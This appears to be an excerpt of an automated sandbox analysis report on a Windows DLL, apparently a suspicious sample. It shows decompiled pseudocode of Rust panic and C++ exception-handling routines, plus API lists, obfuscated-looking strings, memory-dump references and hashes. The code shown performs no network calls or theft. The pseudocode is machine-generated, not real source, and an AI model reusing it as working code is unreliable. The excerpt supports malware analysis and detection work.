									__eflags =  *_t251 - 0x30;
									if( *_t251 != 0x30) {
										goto L84;
									}
									_t271 = 4;
									_t340 = 1;
									goto L85;
								}
								_t207 = GetProcessHeap();
								__eflags = _t207;
								if(__eflags == 0) {
									goto L68;
								}
								 *0x6e4fadc8 = _t207;
								goto L67;
							} else {
								_t340 = _t197;
								__eflags = _t197 - 1;
								if(_t197 != 1) {
									L76:
									_t282 =  *(_t340 + 8);
									__eflags =  *_t340;
									_t138 = _t340 + 4; // 0x4
									_t337 = _t138;
									 *_t340 = 1;
									 *(_t340 + 4) = 0;
									 *(_t340 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t282;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t197 = E6E4AC800(_t282);
											}
										}
									}
									goto L27;
								}
								_v84 = 0;
								_v36 = 0;
								_t213 = 0;
								__eflags = 0;
								goto L48;
							}
						} else {
							_t337 = _t197;
							if( *_t197 != 1) {
								goto L43;
							}
							_t337 = _t337 + 4;
							L27:
							if( *_t337 != 0) {
								E6E4C6EE0(_t268, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6e4ed050, 0x6e4ed720);
								_t348 = _t348 + 0xc;
								goto L62;
							}
							 *_t337 = 0xffffffff;
							_t340 =  *(_t337 + 4);
							if(_t340 == 0) {
								_v36 = _t337;
								_v20 = 8;
								_t250 = E6E4AC690(_t268, _t337, _t340);
								_t337 = _v36;
								_t340 = _t250;
								_t197 =  *(_t337 + 4);
								_t359 = _t197;
								if(_t359 != 0) {
									asm("lock dec dword [eax]");
									if(_t359 == 0) {
										_t285 =  *(_t337 + 4);
										_t197 = E6E4AC800(_t285);
									}
								}
								 *(_t337 + 4) = _t340;
							}
							asm("lock inc dword [esi]");
							if(_t359 <= 0) {
								L17:
								asm("ud2");
								asm("ud2");
								goto L18;
							} else {
								 *_t337 =  *_t337 + 1;
								_v84 = _t340;
								_v36 = _t340;
								if(_t340 != 0) {
									_t212 =  *(_t340 + 0x10);
									__eflags = _t212;
									_t285 =  ==  ? _t212 : _t340 + 0x10;
									if(__eflags != 0) {
										L104:
										_t213 =  *_t285;
										_t285 =  *((intOrPtr*)(_t285 + 4)) - 1;
										L105:
										_v20 = 3;
										L48:
										_v124 = 0x6e4ed8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t215 =  !=  ? _t285 : 9;
										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t324 =  &_v124;
										_v76 =  !=  ? _t285 : 9;
										_v68 =  &_v80;
										_v64 = 0x6e4ade50;
										_v60 =  &_v100;
										_v56 = 0x6e4ade50;
										_v52 =  &_v148;
										_v48 = E6E4ADE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6E4AD2A0( &_v92, _t213) == 3) {
											_v20 = 7;
											_v40 = _t324;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t348 = _t348 + 4;
											_t343 = _v40;
											_t300 =  *((intOrPtr*)(_t343 + 4));
											if( *((intOrPtr*)(_t300 + 4)) != 0) {
												_t248 =  *_t343;
												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
													_t248 =  *(_t248 - 4);
												}
												HeapFree( *0x6e4fadc8, 0, _t248);
											}
											HeapFree( *0x6e4fadc8, 0, _t343);
										}
										_t269 = _v128;
										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t222 == 0) {
											__imp__AcquireSRWLockExclusive(0x6e4fadac);
											_v68 = 0x6e4ed2c0;
											_v64 = 1;
											_v152 = 0x6e4fadac;
											_v41 = _t269;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6E4ADEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t225 = E6E4AD2A0( &_v92, __eflags);
											_t341 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6e4fadac);
											__eflags = _t225 - 3;
											if(__eflags != 0) {
												goto L95;
											}
											_v20 = 5;
											_v40 = _t341;
											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
											_t348 = _t348 + 4;
											goto L90;
										} else {
											if(_t222 == 1) {
												L95:
												_t372 = _v36;
												if(_t372 != 0) {
													asm("lock dec dword [eax]");
													if(_t372 == 0) {
														E6E4AC800(_v84);
													}
												}
												_t342 = _v140;
												_t338 = _v136;
												_t373 = _v72;
												if(_t373 != 0) {
													asm("lock dec dword [eax]");
													if(_t373 == 0) {
														E6E4ADC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6e4fadbc);
												_t374 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6e4eda8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6e4ecd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t229 = E6E4AD2A0( &_v80, _t374);
													_v120 =  &_v68;
													_v124 = _t229;
													E6E4AD460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t285 = _t338;
												E6E4AD440(_t285, _t342);
												asm("ud2");
												goto L104;
											}
											 *0x6e4fa040 = 0;
											_t368 =  *0x6e4fa040;
											if( *0x6e4fa040 == 0) {
												goto L95;
											}
											_t330 =  &_v68;
											_v68 = 0x6e4ed96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6e4ecd60;
											_v48 = 0;
											_v20 = 3;
											if(E6E4AD2A0( &_v92, _t368) != 3) {
												goto L95;
											}
											_v40 = _t330;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
											_t348 = _t348 + 4;
											L90:
											_t296 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t296 + 4)) != 0) {
												_t238 =  *_v40;
												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
													_t238 =  *(_t238 - 4);
												}
												HeapFree( *0x6e4fadc8, 0, _t238);
											}
											HeapFree( *0x6e4fadc8, 0, _v40);
											goto L95;
										}
									}
									_t213 = 0;
									goto L105;
								}
								_t213 = 0;
								goto L48;
							}
						}
					}
				}
			}

































































































                          0x6e4ac897
                          0x6e4ac89a
                          0x6e4ac89e
                          0x6e4ac8a5
                          0x6e4ac8a6
                          0x6e4ac8a8
                          0x6e4ac8ad
                          0x6e4ac8b0
                          0x6e4ac8b2
                          0x6e4ac8b3
                          0x6e4ac8b4
                          0x6e4ac8b5
                          0x6e4ac8b6
                          0x6e4ac8b7
                          0x6e4ac8b8
                          0x6e4ac8b9
                          0x6e4ac8ba
                          0x6e4ac8bb
                          0x6e4ac8bc
                          0x6e4ac8bd
                          0x6e4ac8be
                          0x6e4ac8bf
                          0x6e4ac8c6
                          0x6e4ac8cc
                          0x6e4ac8cf
                          0x6e4ac8d6
                          0x6e4ac8dd
                          0x6e4ac8e2
                          0x6e4ac8e7
                          0x6e4ac8f0
                          0x6e4ac8f3
                          0x6e4ac8f9
                          0x6e4ac901
                          0x6e4ac906
                          0x6e4ac908
                          0x6e4ac922
                          0x6e4ac927
                          0x6e4ac92a
                          0x6e4ac92a
                          0x6e4ac92e
                          0x6e4ac931
                          0x6e4ac934
                          0x6e4ac936
                          0x6e4ac9aa
                          0x6e4ac9ad
                          0x6e4aca0a
                          0x6e4aca11
                          0x6e4aca1b
                          0x6e4aca22
                          0x6e4aca29
                          0x6e4aca2d
                          0x6e4aca34
                          0x6e4aca3b
                          0x6e4aca41
                          0x6e4aca44
                          0x6e4aca47
                          0x6e4aca4d
                          0x6e4aca54
                          0x6e4aca57
                          0x6e4aca5e
                          0x6e4aca63
                          0x6e4aca65
                          0x6e4aca6c
                          0x6e4aca74
                          0x6e4aca77
                          0x6e4aca79
                          0x6e4aca7c
                          0x6e4aca7c
                          0x6e4aca7f
                          0x6e4aca82
                          0x6e4aca86
                          0x6e4aca9c
                          0x6e4aca9c
                          0x6e4acaaa
                          0x6e4acaaa
                          0x00000000
                          0x6e4aca65
                          0x6e4ac9b2
                          0x6e4ac9b5
                          0x6e4ac9bc
                          0x6e4ac9c3
                          0x6e4ac9ca
                          0x6e4ac9d1
                          0x6e4ac9d5
                          0x6e4ac9dc
                          0x6e4ac9e3
                          0x6e4ac9e8
                          0x6e4ac9ea
                          0x00000000
                          0x6e4ac9f0
                          0x6e4ac9f5
                          0x6e4ac9fd
                          0x6e4aca00
                          0x6e4aca02
                          0x00000000
                          0x6e4aca02
                          0x6e4ac93d
                          0x6e4ac93d
                          0x6e4ac945
                          0x6e4ac94b
                          0x6e4ac955
                          0x6e4ac95c
                          0x6e4ac963
                          0x6e4ac969
                          0x6e4ac96c
                          0x6e4ac96f
                          0x6e4ac972
                          0x6e4ac975
                          0x6e4ac97a
                          0x6e4ac97d
                          0x6e4ac97f
                          0x6e4acab3
                          0x6e4acab3
                          0x6e4acab6
                          0x6e4acab8
                          0x6e4acb8b
                          0x6e4acb90
                          0x6e4acb93
                          0x6e4acb96
                          0x6e4acd97
                          0x00000000
                          0x6e4acd97
                          0x6e4acb9c
                          0x6e4acb9f
                          0x6e4acd90
                          0x00000000
                          0x6e4acd90
                          0x6e4acba5
                          0x6e4acba7
                          0x00000000
                          0x00000000
                          0x6e4acbb0
                          0x6e4acbb5
                          0x6e4acbb8
                          0x6e4acbbb
                          0x6e4acbbd
                          0x00000000
                          0x00000000
                          0x6e4acbc3
                          0x00000000
                          0x6e4acbc3
                          0x6e4acabe
                          0x00000000
                          0x6e4ac985
                          0x6e4ac99d
                          0x6e4ac9a2
                          0x6e4acdbe
                          0x6e4acdbe
                          0x6e4acdc0
                          0x6e4acdc0
                          0x6e4acdc5
                          0x6e4acaf3
                          0x6e4acaf3
                          0x6e4acaf6
                          0x6e4acaf9
                          0x6e4acb00
                          0x6e4acb02
                          0x6e4acb07
                          0x6e4acb07
                          0x6e4acb0d
                          0x6e4acb16
                          0x6e4acbf3
                          0x6e4acbf3
                          0x6e4acbf8
                          0x6e4acbfa
                          0x6e4acbfc
                          0x6e4acc01
                          0x6e4acc01
                          0x6e4acc07
                          0x6e4acc0d
                          0x6e4acc0f
                          0x6e4acdcf
                          0x6e4acdd4
                          0x6e4acdd6
                          0x6e4acde6
                          0x6e4acdeb
                          0x6e4acdf0
                          0x6e4acdf2
                          0x6e4ace32
                          0x6e4ace38
                          0x6e4ace3f
                          0x6e4ace41
                          0x6e4ace46
                          0x6e4ace48
                          0x6e4ace4f
                          0x6e4ace52
                          0x6e4ace57
                          0x6e4ace57
                          0x6e4ace5c
                          0x00000000
                          0x6e4ace5c
                          0x6e4acdf4
                          0x6e4acdfe
                          0x6e4ace03
                          0x6e4ace05
                          0x6e4ace05
                          0x6e4ace08
                          0x6e4ace0b
                          0x6e4ace0e
                          0x6e4aceb8
                          0x6e4acebe
                          0x6e4acec9
                          0x6e4acec9
                          0x6e4acece
                          0x6e4acece
                          0x6e4aced0
                          0x6e4aced0
                          0x6e4aced2
                          0x6e4acedd
                          0x6e4acedd
                          0x6e4acee2
                          0x6e4acee2
                          0x6e4aceed
                          0x6e4acef5
                          0x6e4acef8
                          0x6e4acefb
                          0x6e4acefb
                          0x6e4acefb
                          0x6e4acac1
                          0x6e4acac1
                          0x6e4acac7
                          0x6e4acaca
                          0x6e4acaca
                          0x6e4acad0
                          0x6e4acad3
                          0x6e4acad5
                          0x6e4acae3
                          0x6e4acae3
                          0x6e4acae5
                          0x6e4acbcd
                          0x6e4acbd0
                          0x6e4acbde
                          0x6e4acbe0
                          0x00000000
                          0x00000000
                          0x6e4acbe6
                          0x6e4acbe9
                          0x6e4acbeb
                          0x00000000
                          0x6e4acbeb
                          0x6e4acaeb
                          0x6e4acaee
                          0x6e4acaf0
                          0x00000000
                          0x6e4acaf0
                          0x6e4acec0
                          0x6e4acec2
                          0x00000000
                          0x6e4acec2
                          0x6e4ace14
                          0x6e4ace17
                          0x00000000
                          0x00000000
                          0x6e4ace1d
                          0x6e4ace20
                          0x00000000
                          0x00000000
                          0x6e4ace26
                          0x6e4ace28
                          0x00000000
                          0x6e4ace28
                          0x6e4acdd8
                          0x6e4acddd
                          0x6e4acddf
                          0x00000000
                          0x00000000
                          0x6e4acde1
                          0x00000000
                          0x6e4acc15
                          0x6e4acc15
                          0x6e4acc17
                          0x6e4acc1a
                          0x6e4ace62
                          0x6e4ace62
                          0x6e4ace65
                          0x6e4ace68
                          0x6e4ace68
                          0x6e4ace6b
                          0x6e4ace71
                          0x6e4ace78
                          0x6e4ace7f
                          0x6e4ace85
                          0x6e4ace87
                          0x6e4ace8d
                          0x6e4ace90
                          0x6e4ace96
                          0x6e4ace96
                          0x6e4ace90
                          0x6e4ace87
                          0x00000000
                          0x6e4ace7f
                          0x6e4acc20
                          0x6e4acc27
                          0x6e4acc2e
                          0x6e4acc2e
                          0x00000000
                          0x6e4acc2e
                          0x6e4acb1c
                          0x6e4acb1f
                          0x6e4acb21
                          0x00000000
                          0x00000000
                          0x6e4acb27
                          0x6e4acb2a
                          0x6e4acb2d
                          0x6e4acdb6
                          0x6e4acdbb
                          0x00000000
                          0x6e4acdbb
                          0x6e4acb33
                          0x6e4acb39
                          0x6e4acb3e
                          0x6e4acb40
                          0x6e4acb43
                          0x6e4acb4a
                          0x6e4acb4f
                          0x6e4acb52
                          0x6e4acb54
                          0x6e4acb57
                          0x6e4acb59
                          0x6e4acb5b
                          0x6e4acb5e
                          0x6e4acb60
                          0x6e4acb63
                          0x6e4acb63
                          0x6e4acb5e
                          0x6e4acb68
                          0x6e4acb68
                          0x6e4acb6b
                          0x6e4acb6e
                          0x6e4acaaf
                          0x6e4acaaf
                          0x6e4acab1
                          0x00000000
                          0x6e4acb74
                          0x6e4acb74
                          0x6e4acb78
                          0x6e4acb7b
                          0x6e4acb7e
                          0x6e4acea0
                          0x6e4acea6
                          0x6e4acea8
                          0x6e4aceab
                          0x6e4ad062
                          0x6e4ad062
                          0x6e4ad067
                          0x6e4ad068
                          0x6e4ad068
                          0x6e4acc30
                          0x6e4acc37
                          0x6e4acc3e
                          0x6e4acc45
                          0x6e4acc4c
                          0x6e4acc50
                          0x6e4acc57
                          0x6e4acc5e
                          0x6e4acc65
                          0x6e4acc6d
                          0x6e4acc70
                          0x6e4acc76
                          0x6e4acc79
                          0x6e4acc7f
                          0x6e4acc85
                          0x6e4acc8c
                          0x6e4acc95
                          0x6e4acc9c
                          0x6e4acca2
                          0x6e4acca9
                          0x6e4accac
                          0x6e4accba
                          0x6e4accc1
                          0x6e4accc9
                          0x6e4acccc
                          0x6e4accce
                          0x6e4accd1
                          0x6e4accd4
                          0x6e4accdb
                          0x6e4accdd
                          0x6e4acce3
                          0x6e4acce5
                          0x6e4acce5
                          0x6e4accf1
                          0x6e4accf1
                          0x6e4accff
                          0x6e4accff
                          0x6e4acd04
                          0x6e4acd15
                          0x6e4acd1a
                          0x6e4acf0b
                          0x6e4acf1a
                          0x6e4acf21
                          0x6e4acf28
                          0x6e4acf32
                          0x6e4acf35
                          0x6e4acf3c
                          0x6e4acf43
                          0x6e4acf49
                          0x6e4acf50
                          0x6e4acf53
                          0x6e4acf5a
                          0x6e4acf5f
                          0x6e4acf68
                          0x6e4acf6e
                          0x6e4acf71
                          0x00000000
                          0x00000000
                          0x6e4acf78
                          0x6e4acf80
                          0x6e4acf83
                          0x6e4acf85
                          0x00000000
                          0x6e4acd20
                          0x6e4acd23
                          0x6e4acfc0
                          0x6e4acfc3
                          0x6e4acfc5
                          0x6e4acfc7
                          0x6e4acfca
                          0x6e4acfcf
                          0x6e4acfcf
                          0x6e4acfca
                          0x6e4acfd7
                          0x6e4acfdd
                          0x6e4acfe3
                          0x6e4acfe5
                          0x6e4acfe7
                          0x6e4acfea
                          0x6e4acfef
                          0x6e4acfef
                          0x6e4acfea
                          0x6e4acff9
                          0x6e4acfff
                          0x6e4ad003
                          0x6e4ad00a
                          0x6e4ad012
                          0x6e4ad019
                          0x6e4ad020
                          0x6e4ad027
                          0x6e4ad02e
                          0x6e4ad032
                          0x6e4ad039
                          0x6e4ad040
                          0x6e4ad048
                          0x6e4ad04b
                          0x6e4ad04e
                          0x6e4ad053
                          0x6e4ad055
                          0x6e4ad055
                          0x6e4ad057
                          0x6e4ad05b
                          0x6e4ad060
                          0x00000000
                          0x6e4ad060
                          0x6e4acd2b
                          0x6e4acd31
                          0x6e4acd33
                          0x00000000
                          0x00000000
                          0x6e4acd3c
                          0x6e4acd3f
                          0x6e4acd46
                          0x6e4acd4d
                          0x6e4acd54
                          0x6e4acd5b
                          0x6e4acd62
                          0x6e4acd70
                          0x00000000
                          0x00000000
                          0x6e4acd7b
                          0x6e4acd7e
                          0x6e4acd86
                          0x6e4acd88
                          0x6e4acf88
                          0x6e4acf8b
                          0x6e4acf92
                          0x6e4acf9b
                          0x6e4acf9d
                          0x6e4acf9f
                          0x6e4acf9f
                          0x6e4acfab
                          0x6e4acfab
                          0x6e4acfbb
                          0x00000000
                          0x6e4acfbb
                          0x6e4acd1a
                          0x6e4aceb1
                          0x00000000
                          0x6e4aceb1
                          0x6e4acb84
                          0x00000000
                          0x6e4acb84
                          0x6e4acb6e
                          0x6e4acb16
                          0x6e4ac97f

                          APIs
                            • Part of subcall function 6E4AC8C0: AcquireSRWLockShared.KERNEL32(6E4FADBC), ref: 6E4AC945
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6E4ACA9C
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4ACAAA
                          • TlsGetValue.KERNEL32(00000000), ref: 6E4ACB0D
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6E4ACCF1
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4ACCFF
                          Strings
                          • Y3Kn, xrefs: 6E4AC8C5
                          • cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6E4AC90D, 6E4AC988
                          • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6E4ACDC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeHeap$AcquireLockSharedValue
                          • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $Y3Kn$cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf
                          • API String ID: 942675266-1450440702
                          • Opcode ID: 3021220d23c788e73a7696b2c1bea547bd2c99734784ed09e0d92cf6fe8aa35b
                          • Instruction ID: d0be8092e2157e0966223d7f5957c282441ed52d31dcfd4ce53cc7cd77d8b5d2
                          • Opcode Fuzzy Hash: 3021220d23c788e73a7696b2c1bea547bd2c99734784ed09e0d92cf6fe8aa35b
                          • Instruction Fuzzy Hash: AE0235B0900209CFDB50CFF8C844B9EBBB5BF59729F10851ADA15AB384D776A946CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BD036, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 304COMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6E4BD036(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6E4BDF98(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6E4BF563(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6E4BCCF1(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6E4BCCF1(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6E4BC537(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6E4BC46A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6E4BCFB6(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6E4BF563(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6E4BCCF1(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6E4BCCF1(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6E4BCCF1(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6E4BCCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6E4BC46A(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
